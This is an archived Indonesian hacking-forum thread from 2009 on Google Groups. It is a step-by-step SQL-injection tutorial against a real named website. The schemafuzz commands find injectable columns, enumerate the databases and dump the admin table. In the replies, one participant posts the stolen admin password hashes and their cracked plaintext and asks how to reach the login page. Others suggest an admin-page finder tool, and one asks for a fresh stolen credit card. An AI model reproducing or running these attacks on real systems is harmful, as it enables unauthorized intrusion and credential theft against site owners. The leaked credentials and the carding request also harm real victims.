Qruplar Þəkillər Qovluq Web
Recently Visited Groups | Help | Sign in
Google Groups Home
Sedikit Penggunaan Tools untuk SQL Inject
There are currently too many topics in this group that display first. To make this topic appear first, remove this option from another topic.
There was an error processing your request. Please try again.
flag
  5 messages - Collapse all  -  Translate all to Translated (View all originals)
The group you are posting to is a Usenet group. Messages posted to this group will make your email address visible to anyone on the Internet.
Your reply message has not been sent.
Your post was successful
 
From:
To:
Cc:
Followup To:
Add Cc | Add Followup-to | Edit Subject
Subject:
Validation:
For verification purposes please type the characters you see in the picture below or the numbers you hear by clicking the accessibility icon. Listen and type the numbers you hear
 
WoNX  
View profile   Translate to Translated (View Original)
 More options 12 Apr 2009, 14:19
From: WoNX <wonxc...@gmail.com>
Date: Sun, 12 Apr 2009 02:19:30 -0700 (PDT)
Local: Sun 12 Apr 2009 14:19
Subject: Sedikit Penggunaan Tools untuk SQL Inject
Langsung menuju TKP saja deh, dari pada kelamaan.
Kali ini kita gunakan schemafuzz, apakah itu? silahkan cari sendiri,
bagai mana menggunakannya bisa dibaca di banyak posting baik forum
maupun blog.
Bahan-bahan yang dibutuhkan;
1. Python
2. Schemafuzz
3. Koneksi Internet
4. Target Operasi.
-------------------------------------------------------
Langkah pertama tentu saja dengan membuka halaman search engine (my
fav is google)
disana kita mencari target dengan mengetikan kerword bebas sesuai
dengan feeling.
Kebetulan saya menemukan target bagus yaitu http://dibekasi.net/banner_klik.php?id_bnr=37'
karena ditambahkan tanda ( ' ) sehingga muncul You have an error in
your SQL syntax; check the manual that corresponds to your MySQL
server version for the right syntax to use near '\'' at line 1. Itu
adalah salah satu cara mengetahui apakah web ada vurln atau tidak.
Sebenarnya masih ada beberapa cara lain, silahkan ber eksplorasi.

Langkah kedua langsung menggunakan alat yaitu schemafuzz:
1. Schemafuzz.py -u "http://dibekasi.net/banner_klik.php?id_bnr=31" --
findcol
    untuk mengetahui column (angka ajaib yang digunakan untuk proses
injeksi)
    maka akan muncul
http://dibekasi.net/banner_klik.php?id_bnr=31+AND+1=2+UNION+SELECT+0,...,
26
itu digunakan  untuk injeksi selanjutnya.
2. Schemafuzz.py -u "http://dibekasi.net/banner_klik.php?id_bnr=31+AND
+1=2+UNION+SELECT+0,1,2,darkc0de,
4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,
26" --dbs untuk mengetahui semua database yang dipunyai oleh user
tersebut.
3. Untuk melihat table dan fieldnya semua di semua database
perintahnya:
   Schemafuzz.py -u "http://dibekasi.net/banner_klik.php?id_bnr=31+AND
+1=2+UNION+SELECT+0,1,2,darkc0de,
4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,
26" --full
   nanti akan muncul table beserta field-fieldnya, seperti:
--cut--
[60]useradmin:
id_user,nama,username,password,level,user,del,welcome,logout
--cut--
4. Untuk melihat isi tablenya:
   schemafuzz.py -u "http://dibekasi.net/banner_klik.php?id_bnr=31+AND
+1=2+UNION+SELECT+0,1,2,darkc0de,
4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26" --dump
-D "adztrel_dibekasinet" -T "useradmin" -C "username,password"
  Hasilnya : [0] sa:3bea988934f111279159c7fbfd82ddf9:
 Silahkan artikan sendiri apa maksudnya, dan untuk apa itu.

--------------------------------------------------------------------------- -----------------------------
Buat yang tahu duluan/lebih mahir mohon maaf bukannya bermaksud
menggurui tapi cuma mau share.
Buat yang ingin lebih tahu silahkan berdiskusi disini.
--------------------------------------------------------------------------- -----------------------------
NB :
Saya masih nyubi.

Best Regards
WoNX Always Newbie


    Forward  
You must Sign in before you can post messages.
To post a message you must first join this group.
Please update your nickname on the subscription settings page before posting.
You do not have the permission required to post.
IBNU SINA  
View profile   Translate to Translated (View Original)
 More options 14 Apr 2009, 06:12
From: IBNU SINA <sina...@yahoo.com>
Date: Mon, 13 Apr 2009 18:12:23 -0700 (PDT)
Local: Tues 14 Apr 2009 06:12
Subject: Re: [jogjahacking] Sedikit Penggunaan Tools untuk SQL Inject

--- On Sun, 4/12/09, WoNX <wonxc...@gmail.com> wrote:

//Asalamu'alaikum

saya sudah mendapatkan user dan pass pada tabel "useradmin"

hasilnya :

[0] 1:sa:3bea988934f111279159c7fbfd82ddf9:Super Admin:
[1] 44:jkab5z3n:f97530aaffcfc9045b28ea891e65d08b:Super Admin:
[2] No data

setelah saya crack pass menjadi (515190744)dan (ex1hc12c)

Nah yang saya bingung ni pasword utuk Cpanel atau hanya Super Admin di web?

seandainya itu hanya Super Admin di web terus alamat loginnya dimana ya ?

hehe...

tolong kasih pencerahanya ya... !!

maklum saya masik orang awam klw masalah ky ginian.....


    Forward  
You must Sign in before you can post messages.
To post a message you must first join this group.
Please update your nickname on the subscription settings page before posting.
You do not have the permission required to post.
WoNX  
View profile   Translate to Translated (View Original)
 More options 16 Apr 2009, 16:24
From: WoNX <wonxc...@gmail.com>
Date: Thu, 16 Apr 2009 04:24:15 -0700 (PDT)
Local: Thurs 16 Apr 2009 16:24
Subject: Re: Sedikit Penggunaan Tools untuk SQL Inject
Itu adalah user dan pasword dari admin website tsb.
untuk mencari halaman login administratornya bisa dengan coba-coba
sendiri atau dengan tools.
mengenai toolsnya saya belum menemukan yang bener2 cocok.
kalau ada yang punya bisa share.

Thank's atas responnya.

NB: Ibnusina ini dari #hitamputih@DalNet ya?


    Forward  
You must Sign in before you can post messages.
To post a message you must first join this group.
Please update your nickname on the subscription settings page before posting.
You do not have the permission required to post.
cH1km0nK  
View profile   Translate to Translated (View Original)
 More options 16 Apr 2009, 17:06
From: cH1km0nK <chiep...@gmail.com>
Date: Thu, 16 Apr 2009 19:06:08 +0700
Local: Thurs 16 Apr 2009 17:06
Subject: Re: [jogjahacking] Re: Sedikit Penggunaan Tools untuk SQL Inject

owh ya buat tambahan z klo mo nyari alamat login pake bantuan toolz
syaratnya harus di instal framwork
http://www.4shared.com/file/97784534/38e1ecf/reiluke_adminpagefinder....

Pada 16 April 2009 18:24, WoNX <wonxc...@gmail.com> menulis:

--
By : cH1km0nK

http://mocachikmonk.web.id
http://chikmonk.co.cc
http://wss-id.org/blogs/chikmonk


    Forward  
You must Sign in before you can post messages.
To post a message you must first join this group.
Please update your nickname on the subscription settings page before posting.
You do not have the permission required to post.
Haru R4v3  
View profile   Translate to Translated (View Original)
 More options 3 May 2009, 08:49
From: Haru R4v3 <harur...@gmail.com>
Date: Sun, 3 May 2009 10:49:35 +0700
Local: Sun 3 May 2009 08:49
Subject: Re: [jogjahacking] Sedikit Penggunaan Tools untuk SQL Inject
Hallo tmen2 smua,,
Klo ada yg pny CC yg masih fresh, aq minta 1 ya,
Please. . . . .

Pada tanggal 12/04/09, WoNX <wonxc...@gmail.com> menulis:


    Forward  
You must Sign in before you can post messages.
To post a message you must first join this group.
Please update your nickname on the subscription settings page before posting.
You do not have the permission required to post.
End of messages
« Back to Discussions « Newer topic     Older topic »

Create a group - Google Groups - Google Home - Terms of Service - Privacy Policy
©2010 Google